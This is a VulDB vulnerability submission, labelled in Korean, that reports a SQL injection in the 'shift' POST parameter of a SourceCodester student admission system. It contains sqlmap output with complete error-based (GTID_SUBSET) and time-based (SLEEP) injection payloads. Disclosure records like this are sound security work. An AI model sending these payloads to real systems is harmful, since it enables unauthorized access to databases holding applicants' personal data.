| 제목 | Student-Admission CMS Shift parameter Sqlinjection |
|---|
| 설명 | The commit page did not check the shift parameter resulting in Sql injection.
The Shift parameter is not checked resulting in Sql injection
Direct attack using Sqlmap
Sqlmap Attack
···
POST parameter 'shift' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 1581 HTTP(s) requests:
---
Parameter: shift (POST)
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: sname=bbb&gname=aaa&contact=1&[email protected]&address=111111&class=1&shift=1 AND GTID_SUBSET(CONCAT(0x717a766b71,(SELECT (ELT(3656=3656,1))),0x7162766a71),3656)&gender=female&blgroup=abc&division=1&submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: sname=bbb&gname=aaa&contact=1&[email protected]&address=111111&class=1&shift=1 AND (SELECT 2934 FROM (SELECT(SLEEP(5)))GVhT)&gender=female&blgroup=abc&division=1&submit=Submit
---
[09:45:36] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.39, PHP 5.6.9
back-end DBMS: MySQL >= 5.6
···
Url:https://github.com/badboycxcc/Student-Admission-Sqlinjection
Code Download:https://www.sourcecodester.com/php/15514/online-admission-system-php-and-mysql.html
|
|---|
| 원천 | ⚠️ https://github.com/badboycxcc/Student-Admission-Sqlinjection |
|---|
| 사용자 | cxaqhq (UID 23728) |
|---|
| 제출 | 2022. 08. 04. AM 05:20 (4 연령 ago) |
|---|
| 모더레이션 | 2022. 08. 04. AM 07:22 (2 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 205564 [SourceCodester Online Admission System POST Parameter shift SQL 주입] |
|---|
| 포인트들 | 20 |
|---|